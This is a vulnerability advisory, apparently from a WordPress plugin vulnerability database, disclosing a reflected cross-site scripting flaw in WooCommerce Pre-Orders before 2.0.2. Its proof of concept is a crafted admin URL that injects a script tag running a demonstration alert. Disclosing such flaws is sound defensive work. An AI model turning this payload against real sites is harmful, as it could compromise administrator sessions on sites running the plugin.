WordPress Plugin Vulnerabilities
WooCommerce Pre-Orders < 2.0.2 - Reflected XSS
Description
The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin
Proof of Concept
When there is at least one pre-order, make a logged in admin open the URL below https://example.com/wp-admin/admin.php?page=wc_pre_orders&s%5B%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E%5D=1
Affects Plugins
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Chris Shultz
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-06-26 (about 10 months ago)
Added
2023-06-26 (about 10 months ago)
Last Updated
2023-06-26 (about 10 months ago)